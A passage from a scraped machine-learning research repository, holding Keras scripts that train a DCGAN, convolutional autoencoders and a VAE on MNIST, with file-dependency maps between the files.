return model | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", 
"/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,485 | davidhayes3/ME-Project | refs/heads/master | /other/mnist/bigan/mnist_gan_test.py | from keras.models import Sequential
from keras.layers import Dense
from keras.layers import Reshape
from keras.layers.core import Activation
from keras.layers.normalization import BatchNormalization
from keras.layers.convolutional import UpSampling2D
from keras.layers.convolutional import Conv2D, MaxPooling2D
from keras.layers.core import Flatten
from keras.optimizers import SGD
from keras.datasets import mnist
import numpy as np
from PIL import Image
import argparse
import math
import coremltools
import os
import matplotlib.pyplot as plt
def generator_model():
    """DCGAN-style generator: 100-d noise -> 28x28x1 image with tanh output."""
    stages = [
        Dense(input_dim=100, units=1024),
        Activation('tanh'),
        Dense(128 * 7 * 7),
        BatchNormalization(),
        Activation('tanh'),
        Reshape((7, 7, 128), input_shape=(128 * 7 * 7,)),
        UpSampling2D(size=(2, 2)),
        Conv2D(64, (5, 5), padding='same'),
        Activation('tanh'),
        UpSampling2D(size=(2, 2)),
        Conv2D(1, (5, 5), padding='same'),
        Activation('tanh'),
    ]
    net = Sequential()
    for stage in stages:
        net.add(stage)
    return net
def discriminator_model():
    """CNN discriminator: 28x28x1 image -> sigmoid probability that it is real."""
    stages = [
        Conv2D(64, (5, 5), padding='same', input_shape=(28, 28, 1)),
        Activation('tanh'),
        MaxPooling2D(pool_size=(2, 2)),
        Conv2D(128, (5, 5)),
        Activation('tanh'),
        MaxPooling2D(pool_size=(2, 2)),
        Flatten(),
        Dense(1024),
        Activation('tanh'),
        Dense(1),
        Activation('sigmoid'),
    ]
    net = Sequential()
    for stage in stages:
        net.add(stage)
    return net
def generator_containing_discriminator(g, d):
    """Stack g then d, with d frozen, for the generator's update step."""
    d.trainable = False
    combined = Sequential()
    combined.add(g)
    combined.add(d)
    return combined
def generate(batch_size, nice=False):
    """Load the trained generator and save a tiled grid of generated digits.

    If nice is True, over-generate (batch_size * 20 samples), score them with
    the trained discriminator, and keep only the batch_size highest-scoring
    samples before tiling.  The grid is written to 'generated_image.png'.
    """
    g = generator_model()
    g.compile(loss='binary_crossentropy', optimizer="SGD")
    g.load_weights('generator.h5')
    if nice:
        d = discriminator_model()
        d.compile(loss='binary_crossentropy', optimizer="SGD")
        d.load_weights('discriminator.h5')
        noise = np.random.uniform(-1, 1, (batch_size * 20, 100))
        generated_images = g.predict(noise, verbose=1)
        d_pret = d.predict(generated_images, verbose=1)
        # Pair each discriminator score with its sample index, then sort
        # descending by score so the most "real-looking" samples come first.
        index = np.arange(0, batch_size * 20)
        index.resize((batch_size * 20, 1))
        pre_with_index = list(np.append(d_pret, index, axis=1))
        pre_with_index.sort(key=lambda x: x[0], reverse=True)
        nice_images = np.zeros((batch_size,) + generated_images.shape[1:3], dtype=np.float32)
        nice_images = nice_images[:, :, :, None]
        for i in range(batch_size):
            idx = int(pre_with_index[i][1])
            nice_images[i, :, :, 0] = generated_images[idx, :, :, 0]
        image = combine_images(nice_images)
    else:
        noise = np.random.uniform(-1, 1, (batch_size, 100))
        generated_images = g.predict(noise, verbose=1)
        image = combine_images(generated_images)
    # Undo the [-1, 1] tanh scaling back to [0, 255] pixel values
    image = image * 127.5 + 127.5
    Image.fromarray(image.astype(np.uint8)).save(
        "generated_image.png")
def combine_images(generated_images):
    """Tile a batch of images into one near-square grid image.

    Args:
        generated_images: array of shape (num, h, w, channels) -- only the
            first channel is used -- or (num, h, w).

    Returns:
        2-D array of shape (height * h, width * w) with the tiles laid out
        row-major, where width = floor(sqrt(num)) and
        height = ceil(num / width); dtype matches the input.
    """
    num = generated_images.shape[0]
    width = int(math.sqrt(num))
    height = int(math.ceil(float(num) / width))
    shape = generated_images.shape[1:3]
    image = np.zeros((height * shape[0], width * shape[1]),
                     dtype=generated_images.dtype)
    for index, img in enumerate(generated_images):
        i = index // width  # grid row (was int(index / width) -- same value, clearer)
        j = index % width   # grid column
        # Generalized: accept (h, w) tiles as well as the original (h, w, c)
        # layout, from which only channel 0 is taken.
        tile = img if img.ndim == 2 else img[:, :, 0]
        image[i * shape[0]:(i + 1) * shape[0], j * shape[1]:(j + 1) * shape[1]] = tile
    return image
# Train a DCGAN on MNIST: alternate discriminator updates on real/fake batches
# with generator updates through the frozen discriminator, periodically saving
# sample grids and weights, then plot the loss/accuracy trajectories.
(X_train, y_train), (X_test, y_test) = mnist.load_data()
# Rescale pixels to [-1, 1] to match the generator's tanh output
X_train = (X_train.astype(np.float32) - 127.5) / 127.5
X_train = X_train[:, :, :, None]
X_test = X_test[:, :, :, None]
d = discriminator_model()
g = generator_model()
d_on_g = generator_containing_discriminator(g, d)
d_optim = SGD(lr=0.0005, momentum=0.9, nesterov=True)
g_optim = SGD(lr=0.0005, momentum=0.9, nesterov=True)
# NOTE(review): g is compiled with the string "SGD" (default settings), so
# g_optim is only used via d_on_g -- confirm this is intentional.
g.compile(loss='binary_crossentropy', optimizer="SGD")
d_on_g.compile(loss='binary_crossentropy', optimizer=g_optim)
d.trainable = True
d.compile(loss='binary_crossentropy', optimizer=d_optim, metrics=['accuracy'])
epochs = 100
batch_size = 128
# Define arrays to hold progression of discriminator and generator losses
d_epoch_loss_trajectory = np.zeros(epochs)
g_epoch_loss_trajectory = np.zeros(epochs)
d_acc_trajectory = np.zeros(epochs)
num_batches = int(X_train.shape[0] / batch_size)
for epoch in range(epochs):
    print("Epoch is", epoch)
    print("Number of batches", int(X_train.shape[0] / batch_size))
    g_epoch_loss = 0
    d_epoch_loss = 0
    d_acc = 0
    for index in range(num_batches):
        noise = np.random.uniform(-1, 1, size=(batch_size, 100))
        image_batch = X_train[index * batch_size:(index + 1) * batch_size]
        generated_images = g.predict(noise, verbose=0)
        # Every 20 batches, save a tiled grid of current samples to disk
        if index % 20 == 0:
            image = combine_images(generated_images)
            image = image * 127.5 + 127.5
            Image.fromarray(image.astype(np.uint8)).save("Images/" + str(epoch) + "_" + str(index) + ".png")
        # Discriminator step: real images labelled 1, generated labelled 0
        X = np.concatenate((image_batch, generated_images))
        y = [1] * batch_size + [0] * batch_size
        d_loss = d.train_on_batch(X, y)
        d_epoch_loss += d_loss[0]
        d_acc += d_loss[1]
        noise = np.random.uniform(-1, 1, (batch_size, 100))
        #noise = np.random.lognormal(mean=0, sigma=1, size=(batch_size, 100))
        # Generator step: freeze d and train g to make d output "real" (1)
        d.trainable = False
        g_loss = d_on_g.train_on_batch(noise, [1] * batch_size)
        d.trainable = True
        g_epoch_loss += g_loss
        # Print progress
        print("[Epoch: %d, Batch: %d / %d] [D loss: %f, acc: %.2f%%] [G loss: %f]" % (epoch+1, index, num_batches,
                                                                                      d_loss[0], 100 * d_loss[1],
                                                                                      g_loss))
        # Checkpoint weights every 10 batches
        if index % 10 == 9:
            g.save_weights('generator.h5', True)
            d.save_weights('discriminator.h5', True)
    # Record epoch loss data
    d_epoch_loss_trajectory[epoch] = d_epoch_loss / num_batches
    g_epoch_loss_trajectory[epoch] = g_epoch_loss / num_batches
    d_acc_trajectory[epoch] = 100 * (d_acc / num_batches)
# Plot epoch loss curves
plt.figure()
epoch_numbers = np.arange(epochs) + 1
plt.plot(epoch_numbers, d_epoch_loss_trajectory, 'b-', epoch_numbers, g_epoch_loss_trajectory, 'r-')
plt.legend(['Discriminator', 'Generator'], loc='upper right')
plt.xlabel('Epoch Number')
plt.ylabel('Average Minibatch Loss')
plt.savefig('Images/mnist_gan_epochloss.png')
# Plot discriminator accuracy over epochs
plt.figure()
plt.plot(epoch_numbers, d_acc_trajectory)
plt.xlabel('Epoch Number')
plt.ylabel('Accuracy')
plt.savefig('Images/mnist_gan_discriminator_acc.png')
| {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", 
"/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,486 | davidhayes3/ME-Project | refs/heads/master | /other/mnist/convolutional_autoencoder/keras_conv_ae_use.py | import keras
from keras import backend as K
from keras.datasets import mnist
import numpy as np
import matplotlib.pyplot as plt
from mnist_conv_ae_models import *
from keras.callbacks import EarlyStopping
import seaborn as sns
sns.set(style="whitegrid", color_codes=True)
np.random.seed(1326) # for reproducibility
# Load dataset
(x_train, y_train), (x_test, y_test) = mnist.load_data()
x_train = x_train.astype('float32') / 255.
x_test = x_test.astype('float32') / 255.
x_train = np.reshape(x_train, (len(x_train), 28, 28, 1)) # adapt this if using `channels_first` image data format
x_test = np.reshape(x_test, (len(x_test), 28, 28, 1)) # adapt this if using `channels_first` image data format
y_train_onehot = keras.utils.to_categorical(y_train, 10)
y_test_onehot = keras.utils.to_categorical(y_test, 10)
# Test features learned by encoder
# Load encoder and decoder models
pretrained_e = encoder_model()
pretrained_e.load_weights('encoder.h5')
# Build classifier using encoder from autoencoder, encoder is not trainable
mnist_classifier_pretrained_e = classifier_e_frozen_model(pretrained_e)
# Print number of trainable and non-trainable parameters in the classifier
trainable_count = int(
    np.sum([K.count_params(p) for p in set(mnist_classifier_pretrained_e.trainable_weights)]))
non_trainable_count = int(
    np.sum([K.count_params(p) for p in set(mnist_classifier_pretrained_e.non_trainable_weights)]))
print('Classifier w/ Unsupervised Encoder + FC Layers')
print('Total parameters: {:,}'.format(trainable_count + non_trainable_count))
# Fixed typo in the label below ('paramseter' -> 'parameters')
print('Trainable parameters: {:,}'.format(trainable_count))
print('Non-trainable parameters: {:,}'.format(non_trainable_count))
callbacks = [EarlyStopping(monitor='val_loss', min_delta=0, patience=5, verbose=0, mode='auto')]
# Hyperparameters for both models
batch_size=100
epochs=100
val_split = 1/5.
num=5000
# change size of training sets
x_train = x_train[0:num, :, :, :]
y_train_onehot = y_train_onehot[0:num]
# Train model
mnist_classifier_pretrained_e.compile(loss=keras.losses.categorical_crossentropy,
optimizer=keras.optimizers.Adadelta(),
metrics=['accuracy'])
mnist_classifier_pretrained_e.fit(x_train, y_train_onehot,
batch_size=batch_size,
epochs=epochs,
verbose=1,
callbacks=callbacks,
validation_split=val_split)
incorrects = np.nonzero(mnist_classifier_pretrained_e.predict_classes(x_test).reshape((-1,)) != y_test)
y_incorrects = y_test[incorrects]
# Plot frequency of incorrect labels
sns.countplot(x=y_incorrects, palette="Greens_d")
plt.ylabel('Number Predicted Incorrectly')
plt.xlabel('MNIST Digit')
plt.show()
| {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", 
"/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,487 | davidhayes3/ME-Project | refs/heads/master | /other/mnist/convolutional_autoencoder/linear_transform_test.py | from scipy.fftpack import dct, idct
from keras.layers import Conv2D, MaxPooling2D, UpSampling2D, Flatten, Activation, Reshape, Input
from keras.models import Sequential, Model
import keras.utils
from keras.datasets import mnist
from keras.callbacks import EarlyStopping, TensorBoard
import numpy as np
import matplotlib.pyplot as plt
import pywt
# Define models
def encoder_model():
    """Build the convolutional encoder: (28, 28, 1) image -> flat 128-dim code.

    Three conv/relu/max-pool stages reduce 28x28 -> 14x14 -> 7x7 -> 4x4 with
    8 channels; the result is flattened to a 128-dim feature vector.
    """
    z = Input(shape=(28,28,1))
    #z = dct(dct(z.T, norm='ortho').T, norm='ortho')
    x = Conv2D(16, kernel_size=(3, 3), padding='same')(z)
    x = Activation('relu')(x)
    x = MaxPooling2D(pool_size=(2, 2), padding='same')(x)
    x = Conv2D(8, (3, 3), padding='same')(x)
    x = Activation('relu')(x)
    x = MaxPooling2D((2, 2), padding='same')(x)
    x = Conv2D(8, (3, 3), padding='same')(x)
    x = Activation('relu')(x)
    x = MaxPooling2D((2, 2), padding='same')(x)
    # Removed a second consecutive Activation('relu') here: relu is idempotent
    # on the non-negative output of relu + max-pool, so the layer was a no-op.
    x = Flatten()(x)
    return Model(z, x)
def decoder_model():
    """Build the convolutional decoder: flat 128-dim code -> (28, 28, 1) image."""
    x = Input(shape=(128,))
    z = Reshape((4,4,8))(x)  # 128 -> 4x4 feature maps with 8 channels
    z = Conv2D(8, kernel_size=(3, 3), padding='same')(z)
    z = Activation('relu')(z)
    z = UpSampling2D((2,2))(z)  # 4x4 -> 8x8
    z = Conv2D(8, (3, 3), padding='same')(z)
    z = Activation('relu')(z)
    z = UpSampling2D((2, 2))(z)  # 8x8 -> 16x16
    z = Conv2D(16, (3, 3))(z)  # valid padding on purpose: 16x16 -> 14x14 so the final upsample yields 28x28
    z = Activation('relu')(z)
    z = UpSampling2D((2, 2))(z)  # 14x14 -> 28x28
    z = Conv2D(1, (3, 3), padding='same')(z)
    z = Activation('sigmoid')(z)  # pixel intensities in [0, 1]
    #z = idct(idct(z.T, norm='ortho').T, norm='ortho')
    return Model(x, z)
def autoencoder_model(encoder, decoder):
    """Chain the encoder and decoder into a single sequential autoencoder."""
    return Sequential([encoder, decoder])
np.random.seed(1337) # for reproducibility
# Load dataset
(x_train, y_train), (x_test, y_test) = mnist.load_data()
x_train = x_train.astype('float32') / 255.
x_test = x_test.astype('float32') / 255.
x_train = np.reshape(x_train, (len(x_train), 28, 28, 1)) # adapt this if using `channels_first` image data format
x_test = np.reshape(x_test, (len(x_test), 28, 28, 1)) # adapt this if using `channels_first` image data format
# NOTE(review): dct() defaults to axis=-1, which here is the channel axis of
# length 1 -- probably intended over image rows/columns instead; confirm.
dct_x_train = dct(x_train)
dct_x_test = dct(x_test)
# NOTE(review): pywt.dwt2 returns a tuple (cA, (cH, cV, cD)); indexing [0]
# below yields the approximation coefficients, whose shape is not (28, 28),
# so the reshape on the last imshow likely fails -- verify.
dwt_x_train = pywt.dwt2(x_train, wavelet='coif1')
print(dct_x_train.shape)
plt.imshow(x_train[0].reshape(28, 28))
plt.show()
plt.imshow(dct_x_train[0].reshape(28, 28))
plt.show()
plt.imshow(dwt_x_train[0].reshape(28, 28))
plt.show()
y_train = keras.utils.to_categorical(y_train, 10)
y_test = keras.utils.to_categorical(y_test, 10)
# Create models for encoder, decoder and combined autoencoder
e = encoder_model()
d = decoder_model()
autoencoder = autoencoder_model(e, d)
# Specify loss function and optimizer for autoencoder
#autoencoder.compile(optimizer='adam', loss='mse', metrics=['accuracy'])
autoencoder.compile(optimizer='adadelta', loss='binary_crossentropy', metrics=['accuracy'])
callbacks = [EarlyStopping(monitor='val_loss', min_delta=0, patience=5, verbose=0, mode='auto'),
TensorBoard(log_dir='/tmp/autoencoder', histogram_freq=5, write_graph=True,
write_images=True)]
history = autoencoder.fit(dct_x_train, x_train,
epochs=100,
batch_size=128,
shuffle=True,
validation_split = 1/12.,
callbacks=callbacks,
verbose=1
)
# Summarize history for accuracy
plt.plot(history.history['acc'])
plt.plot(history.history['val_acc'])
plt.title('Training vs Validation Accuracy')
plt.ylabel('Accuracy')
plt.xlabel('Epoch')
plt.legend(['Train', ' Validation'], loc='lower right')
plt.show()
# Summarize history for loss
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.title('Training vs Validation Loss')
plt.ylabel('Loss')
plt.xlabel('Epoch')
plt.legend(['Train', 'Validation'], loc='upper right')
plt.show()
# Reconstruct images based on learned autencoder
# NOTE(review): the model was fit on dct_x_train inputs but predicts on raw
# x_test here -- input domains differ; confirm whether dct_x_test was intended.
recon_imgs = autoencoder.predict(x_test)
# Plot reconstructed images
n = 10
plt.figure(figsize=(20, 4))
for i in range(n):
# display original
ax = plt.subplot(2, n, i + 1)
plt.imshow(x_test[i].reshape(28, 28))
plt.gray()
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
# display reconstruction
ax = plt.subplot(2, n, i + 1 + n)
plt.imshow(recon_imgs[i].reshape(28, 28))
plt.gray()
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
plt.show() | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", 
"/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,488 | davidhayes3/ME-Project | refs/heads/master | /train_models/mnist_mlp/mnist_vae_train.py | from __future__ import print_function
import numpy as np
from functions.data_funcs import get_mnist
from functions.visualization_funcs import plot_train_loss, save_reconstructions
from functions.auxiliary_funcs import save_models
from mnist_mlp_models import vae_encoder_model, generator_model
from common_models.common_models import vae_model, vae_encoder_sampling_model
from keras import backend as K
from keras import metrics
from keras.models import Model
from keras.layers import Input, Lambda
from keras.callbacks import EarlyStopping, ModelCheckpoint
# Set random seed for reproducibility
np.random.seed(12345)
# =====================================
# Define constants
# =====================================
img_rows = 28
img_cols = 28
channels = 1
img_shape = (img_rows, img_cols, channels)
latent_dim = 100
num_classes = 10
image_path = 'Images/mnist_vae'
model_path = 'Models/mnist_vae'
epsilon_std = 0.05
# =====================================
# Load dataset
# =====================================
(X_train, y_train), (X_test, y_test) = get_mnist()
# =====================================
# Instantiate and compile models
# =====================================
# Instantiate models
encoder = vae_encoder_model()
generator = generator_model()
# Define sampling function
def sampling(args):
    """Reparameterization trick: z = mean + exp(log_var / 2) * eps.

    args is the pair (z_mean, z_log_var); eps ~ N(0, epsilon_std).
    Uses the module-level constants latent_dim and epsilon_std.
    """
    z_mean, z_log_var = args
